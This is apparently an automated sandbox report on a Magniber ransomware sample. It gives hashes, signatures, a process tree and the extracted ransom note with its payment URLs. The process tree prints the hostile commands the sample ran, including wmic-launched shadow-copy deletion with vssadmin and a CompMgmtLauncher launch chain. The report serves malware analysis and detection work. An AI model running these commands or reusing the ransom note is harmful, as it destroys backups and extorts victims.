Overview

overview

10

Static

static

9.exe

windows7_x64

10

9.exe

windows10_x64

10

Analysis

  • max time kernel
    120s
  • max time network
    199s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-06-2021 15:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9.exe

  • Size

    21KB

  • MD5

    6e4d7e63e05ef919d2b8724fbc3f3eeb

  • SHA1

    97730b10da62c23ee6554625f5c24bf262aae261

  • SHA256

    a5a2b6bfba012554d3c7e01c9df1173f995639caf31fdde8693e30ef501d26d7

  • SHA512

    641c16245535d0e7eff19063830f8b8448d51fdefd6384a615495709b203c1522603292140b951cd220d1cd22e0f414f5c0e156633b2eb69f8ecf7fde8cdef86

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://0ce07ed8d4c45800ssdxwead.ndkeblzjnpqgpo5o.onion/ssdxwead Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead http://0ce07ed8d4c45800ssdxwead.wonride.site/ssdxwead http://0ce07ed8d4c45800ssdxwead.lognear.xyz/ssdxwead http://0ce07ed8d4c45800ssdxwead.bejoin.space/ssdxwead Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://0ce07ed8d4c45800ssdxwead.ndkeblzjnpqgpo5o.onion/ssdxwead

http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead

http://0ce07ed8d4c45800ssdxwead.wonride.site/ssdxwead

http://0ce07ed8d4c45800ssdxwead.lognear.xyz/ssdxwead

http://0ce07ed8d4c45800ssdxwead.bejoin.space/ssdxwead

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Users\Admin\AppData\Local\Temp\9.exe
      "C:\Users\Admin\AppData\Local\Temp\9.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1304
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1844
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:848
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1344
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
          PID:1648
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1120
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        PID:1372
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead^&1^&39881967^&72^&315^&12"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:692
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead&1&39881967&72&315&12
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1788
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1052
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1848
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:612
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1732
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:1652
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1308
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
            PID:1600
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:304
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            PID:1804
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1556
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:1060
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:292
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:676
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:1084
              • C:\Windows\system32\conhost.exe
                \??\C:\Windows\system32\conhost.exe "2100226177-423966974-3799054542608157131163108094-2108732498-15245291691214588763"
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1648
              • C:\Windows\system32\DllHost.exe
                C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                1⤵
                • Suspicious use of WriteProcessMemory
                PID:1600
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:1644
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:1684
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                PID:764
              • C:\Windows\system32\vssadmin.exe
                vssadmin.exe Delete Shadows /all /quiet
                1⤵
                • Process spawned unexpected child process
                • Interacts with shadow copies
                • Suspicious use of WriteProcessMemory
                PID:1804
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                  PID:960

                Network

                MITRE ATT&CK Enterprise v6

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\C8J50LBR.txt
                  MD5

                  966a75c744e5db994ab9fdceb5e4d095

                  SHA1

                  38f67c118cab4e1eca8c17b49ebe366aa246fc5e

                  SHA256

                  87ee030e99c6f242a92c8b035f9c2fddb1859fc63418e6d07f3d1b89ad905069

                  SHA512

                  1407fac116922c3af44ae74e3448e6d1e5e1c89f7cb0e7d3b20a3855491a1b6766c7669c7e91b52509cf48f24ea524e49fdb5f6a52b0d9ee934f229ef2d8f35a

                  Download Submit

                • C:\Users\Admin\Desktop\CompleteStart.emf.ssdxwead
                  MD5

                  a6163698a84846f4cffde05ba32da46c

                  SHA1

                  65a87f81aea0a45fd6406c1b4f4c3ac9191fcc3e

                  SHA256

                  24417d0c8bfa46407961a53a6f119e1f74cf15b1a8af48ff459b3a0a756199be

                  SHA512

                  f66b2b0d930de6fa08081f550b751fe253df5db5377b85c40c5be632f4f883be527209f214d49638b92ca8e0bb1e9a47c9dda634775da3600e953a508bb35523

                  Download Submit

                • C:\Users\Admin\Desktop\ConvertToEnter.mov.ssdxwead
                  MD5

                  8ede3038c923ecde6e790efd4ba35736

                  SHA1

                  8c54b0ca577b244533b26dcea44c95a31fd0df88

                  SHA256

                  852b18f05e4fb1ccf7288e2e20f75a52a7da938996c00b10eef7c0d576762b79

                  SHA512

                  fbf871d22cfa605cc383ff395ab9a9aad56317236c7158760171ac10c3b01ab1ffd656025ee366a4c17611609fdff0c461cb540e0868d93303eddff14d6ccef7

                  Download Submit

                • C:\Users\Admin\Desktop\FormatConfirm.mov.ssdxwead
                  MD5

                  720143e024af846ea0e35dc7601c14fa

                  SHA1

                  96dccfa11551d6a6a60e24af00de6e085dc536d9

                  SHA256

                  f08afe808e611b347460471a707a3c0229f2e21a91a11e8479d93904421aaf60

                  SHA512

                  8ca5eca7dd2b40075543b311f98dbd56d0ef63f313ffd41619781e38117b6381c9441484a117d7f3001f694f3cb4356f2e2ea083f0681a02ea9ad8d22c9e6e71

                  Download Submit

                • C:\Users\Admin\Desktop\MergeJoin.bmp.ssdxwead
                  MD5

                  56644ba80e2f0f68b03ae1be93c04e5d

                  SHA1

                  7b91e178f59b4782078b697e5c7e5d54181c4d2f

                  SHA256

                  89e1e5b619e1cc6372d3aaed15eead85abc3ae86386446560c352afc7e00fc1c

                  SHA512

                  6b984b9445d13ffeaaf0f588f51b1b6d488cdce454bc26d52a9f544bda9f11d74faecf9e12bf21ac95f120101c01e82d6b129d4bcc937c6b224a4bddc48bdf87

                  Download Submit

                • C:\Users\Admin\Desktop\MergeTest.svgz.ssdxwead
                  MD5

                  9ac76e1876ea14f3ee9932c0b42711be

                  SHA1

                  ef8bfff4630e463d14e4b061c7e66a91d94600ff

                  SHA256

                  93f4570fb75da6a5a857fef90ef240c94819f0bfac4ad916f3b5af378de84352

                  SHA512

                  6339b10fac48cca1c5c01c11f196ce940cc3ec5273b18ec51863454bcb14d6b10f90de9fb13f78eaea148efc878387e8ae18ec227ff9d98b26e7d70d3414f02f

                  Download Submit

                • C:\Users\Admin\Desktop\NewConnect.nfo.ssdxwead
                  MD5

                  266c6a41b13a602a2c6b4d9e091708d3

                  SHA1

                  0e525b0d6db77fc47620e1dd4f0658456091df60

                  SHA256

                  2b23b09e63ef2cf53e03ed5aa588fb7362decf3f3a61cbeecb7fdd344c203f9b

                  SHA512

                  f76c4f24481bf240e2933ae5bf4ec5a1d99476e866636b6e4fbf9145aed68e95e2870af5efec90ebb39a801cdefdecc9948d8eaee05f234d5323f9cc3350c991

                  Download Submit

                • C:\Users\Admin\Desktop\PopConfirm.pot.ssdxwead
                  MD5

                  baaaba86b979f2a3a4876baa0a43823f

                  SHA1

                  892cf323a67ba0e634a041a3c8d7c6e430c33b02

                  SHA256

                  69ca28e9fd5fb20e72fd984c77e8e9ee58703a882227a017c11fd15378e0060c

                  SHA512

                  af779f7be0032489de103123edfdccc76cf52f110c889985f11929a057f792c08dd75229a68e50cefc08ca6c18139a66e1a8fdebb565df9eeefb805c6a93300c

                  Download Submit

                • C:\Users\Admin\Desktop\PushRead.bmp.ssdxwead
                  MD5

                  db5f659a7760171aad647496717b158f

                  SHA1

                  f626cbe6c147e8dd86324b94a3b74bb01d3d646e

                  SHA256

                  01d20dfcbccf168a72ecb361dc1718c93846e1617012d73be0eb914c82169edc

                  SHA512

                  62de7ad82f18f1fca361fa02a681dcb7cbde2d650585251270bc88432d314721275376aa629a000058555997c46697788aec7ba107fd7921d245661566655797

                  Download Submit

                • C:\Users\Admin\Desktop\StepUninstall.jpg.ssdxwead
                  MD5

                  c48ecb552c993735b2d4a807d1d51916

                  SHA1

                  f1e050135ba46d98d1bdd1479c5c1cdfc4462ca2

                  SHA256

                  4458b7028f42bd61597bc912554a6e24809031caddab89fb2bcd91b7f9feb6de

                  SHA512

                  08369e8f782393d026ca0457485fcc161a60ff0cb68196077664853cf0e483ac82ddd932cdbd6f3f58eaeffd9459a4a60e154bb3fb364b0734d764dbc753dc66

                  Download Submit

                • C:\Users\Admin\Desktop\UnblockShow.xps.ssdxwead
                  MD5

                  5701c241a93865b3c0f07245f7aa1df8

                  SHA1

                  b404526a9bad213193b436edc74aa54ac2d0e4fa

                  SHA256

                  8101cf7d35fee8ccf792e035e2b8a0995a957379fe5aaa0273b50fcf3c41c6ef

                  SHA512

                  cb32ea4e6a3a031703b65bacb86b1a959f807a7302beee3c3b89f3db6bf7736dbf3c3a44562a9acbcbac726730a1d2c3c7ab44e6a48a4f269581192c283d5613

                  Download Submit

                • C:\Users\Admin\Desktop\UpdateGet.xps.ssdxwead
                  MD5

                  2ce49dc91ae538a4a2b4c05d18116102

                  SHA1

                  1e299fe87de28d18f6ecd799b4799c38f08e74b6

                  SHA256

                  bfbe69cfe4f9b0f1b320db53a2fbafa63ebb763257d6ef24572661add98b5b99

                  SHA512

                  45e4ce724d3aecd4c422b9f5b2b2d7847852c7182b2350b1096b17051af6b1d7944b932f91c667f554983eba577f35a1dbe0676be2bad8bd201432b10bbcd066

                  Download Submit

                • C:\Users\Admin\Desktop\readme.txt
                  MD5

                  77defd8bcb8c2580d63aa544f4e22126

                  SHA1

                  88a3b2b164da59a78cd0783c55dbf945f331a828

                  SHA256

                  15a3fe88e8dd41c4f55f0cd537f601649ce57a7932540b8269ec2047ed1a74cd

                  SHA512

                  a9a074d720dc6ab91e0f156c49f3c3332285fd4de90fb2899d05f9d5d8eabc8fca8abd1f195a0c6cbb12e94d50d9483bac05011560658e851d96919372692e0b

                  Download Submit

                • C:\Users\Public\readme.txt
                  MD5

                  77defd8bcb8c2580d63aa544f4e22126

                  SHA1

                  88a3b2b164da59a78cd0783c55dbf945f331a828

                  SHA256

                  15a3fe88e8dd41c4f55f0cd537f601649ce57a7932540b8269ec2047ed1a74cd

                  SHA512

                  a9a074d720dc6ab91e0f156c49f3c3332285fd4de90fb2899d05f9d5d8eabc8fca8abd1f195a0c6cbb12e94d50d9483bac05011560658e851d96919372692e0b

                  Download Submit

                • memory/304-148-0x0000000000000000-mapping.dmp

                  Download

                • memory/676-137-0x0000000000000000-mapping.dmp

                  Download

                • memory/692-127-0x0000000000000000-mapping.dmp

                  Download

                • memory/848-134-0x0000000000000000-mapping.dmp

                  Download

                • memory/1052-150-0x0000000000000000-mapping.dmp

                  Download

                • memory/1060-146-0x0000000000000000-mapping.dmp

                  Download

                • memory/1084-147-0x0000000000000000-mapping.dmp

                  Download

                • memory/1120-96-0x00000000002D0000-0x00000000002D4000-memory.dmp

                  Filesize

                  16KB

                  Download

                • memory/1224-79-0x0000000002740000-0x0000000002750000-memory.dmp

                  Filesize

                  64KB

                  Download

                • memory/1304-136-0x0000000000000000-mapping.dmp

                  Download

                • memory/1344-131-0x0000000000000000-mapping.dmp

                  Download

                • memory/1372-123-0x0000000000000000-mapping.dmp

                  Download

                • memory/1372-125-0x000007FEFC051000-0x000007FEFC053000-memory.dmp

                  Filesize

                  8KB

                  Download

                • memory/1556-140-0x0000000000000000-mapping.dmp

                  Download

                • memory/1600-139-0x0000000000000000-mapping.dmp

                  Download

                • memory/1608-128-0x0000000000000000-mapping.dmp

                  Download

                • memory/1648-133-0x0000000000000000-mapping.dmp

                  Download

                • memory/1652-149-0x0000000000000000-mapping.dmp

                  Download

                • memory/1732-138-0x0000000000000000-mapping.dmp

                  Download

                • memory/1788-145-0x0000000000000000-mapping.dmp

                  Download

                • memory/1792-135-0x0000000000000000-mapping.dmp

                  Download

                • memory/1844-132-0x0000000000000000-mapping.dmp

                  Download

                • memory/1848-130-0x0000000000000000-mapping.dmp

                  Download

                • memory/1988-62-0x0000000000200000-0x0000000000201000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-87-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-88-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-89-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-63-0x0000000000210000-0x0000000000211000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-61-0x00000000001F0000-0x00000000001F1000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-91-0x0000000001D00000-0x0000000001D01000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-59-0x0000000000020000-0x0000000000025000-memory.dmp

                  Filesize

                  20KB

                  Download

                • memory/1988-92-0x0000000001D10000-0x0000000001D11000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-93-0x0000000001D20000-0x0000000001D21000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-94-0x0000000001D30000-0x0000000001D31000-memory.dmp

                  Filesize

                  4KB

                  Download

                • memory/1988-60-0x0000000000070000-0x0000000000071000-memory.dmp

                  Filesize

                  4KB

                  Download